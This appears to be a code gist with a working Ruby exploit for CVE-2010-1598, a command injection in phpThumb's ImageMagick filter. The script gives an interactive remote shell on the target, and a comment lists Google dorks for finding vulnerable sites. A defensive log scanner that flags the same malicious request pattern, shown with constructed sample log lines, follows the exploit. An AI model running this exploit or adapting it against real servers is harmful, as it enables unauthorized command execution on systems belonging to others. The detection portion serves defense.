Created September 20, 2022 18:33
CVE-2010-1598 exploit via "ImageMagick" extension.
require 'net/http'
require 'cgi'
puts """
CVE-2010-1598
PhpThumb OS command injection exploit\n
by Komodo\n
"""
=begin
Google dork to search vulnerable targets:
inurl:phpThumb.php Deprecated: Function eregi() is deprecated in /home/
inurl:"/scripts/phpthumb"
(most of this may not work)
=end
def main(target)
    payload = "?src=file.jpg&fltr[]=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;---;%20&phpThumbDebug=9"
    while true
        print "$ ";command = gets.chomp
        target.delete_suffix!("/") unless target[-1..-1] != "/"
        uwu = "#{target.chomp}/phpThumb.php"+payload.gsub("---", CGI.escape(command))
        r = Net::HTTP.get_response(URI(uwu))
        if r.code == "200"
            if r.body.include?("ImageMagick failed with message")
                begin
                    puts "\n#{r.body.match(/ImageMagick failed with message(.*)sh: -quality: command not found/m)[1].strip.split('(')[1]}\n"
                rescue TypeError, NoMethodError
                    puts "Null output"
                end
            else
                puts "Maybe the target is not vulnerable"
            end
        else
            puts r.code
        end
    end
end
begin
    print "Url: "
    main(gets.chomp)
rescue => e
    puts e
end
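For defenders, the request shape used above (a `fltr[]` value carrying shell metacharacters, together with `phpThumbDebug`) is easy to spot in web server access logs. The scanner below is an added example, not part of the gist or of phpThumb; it assumes combined-format log lines, and the sample lines and all names in it are constructed for illustration.

```ruby
require 'uri'

# Characters that let a filter value break out of the shell command line.
# A lone "|" is not listed because phpThumb uses it to separate filter arguments.
SHELL_META = /[;&`<>\n]|\$\(/
REQUEST_RE = /"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+" (\d{3})/

# Constructed sample access-log lines (documentation IP range, made-up paths).
SAMPLE_LOG = [
  '203.0.113.5 - - [20/Sep/2022:18:33:00 +0000] "GET /phpThumb.php?src=a.jpg&w=100&fltr[]=blur%7C9 HTTP/1.1" 200 5120',
  '203.0.113.9 - - [20/Sep/2022:18:34:10 +0000] "GET /scripts/phpthumb/phpThumb.php?src=a.jpg&fltr[]=blur%7C9%20%3B%20id%20%3B&phpThumbDebug=9 HTTP/1.1" 200 912',
  '203.0.113.9 - - [20/Sep/2022:18:35:00 +0000] "GET /index.php?q=a;b HTTP/1.1" 200 300'
].freeze

def decode(text)
  URI.decode_www_form_component(text).scrub
rescue ArgumentError
  text # malformed %-encoding: fall back to inspecting the raw text
end

# Returns the reasons a log line looks like a phpThumb injection attempt ([] if none).
def inspect_line(line)
  m = REQUEST_RE.match(line) or return []
  path, query = m[1].split('?', 2)
  return [] unless query && File.basename(path).casecmp?('phpThumb.php')
  reasons = []
  query.split('&').each do |pair|
    next if pair.empty?
    key, value = pair.split('=', 2).map { |part| decode(part) }
    value ||= ''
    if key.start_with?('fltr') && value.match?(SHELL_META)
      reasons << "shell metacharacter in #{key}: #{value.inspect}"
    elsif key == 'phpThumbDebug'
      reasons << "debug output requested: phpThumbDebug=#{value}"
    end
  end
  reasons
end

# Returns [line_number, reasons] for every flagged line.
def scan(lines)
  lines.each_with_index.map { |l, i| [i + 1, inspect_line(l)] }.reject { |_, r| r.empty? }
end

scan(SAMPLE_LOG).each { |n, reasons| puts "line #{n}: #{reasons.join('; ')}" }
```

A `phpThumbDebug` hit on its own is a weaker signal than a metacharacter in `fltr[]`; treat the two together as high confidence.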
Unfortunately, most of the results indexed by Google are no longer vulnerable because the CVE is relatively old.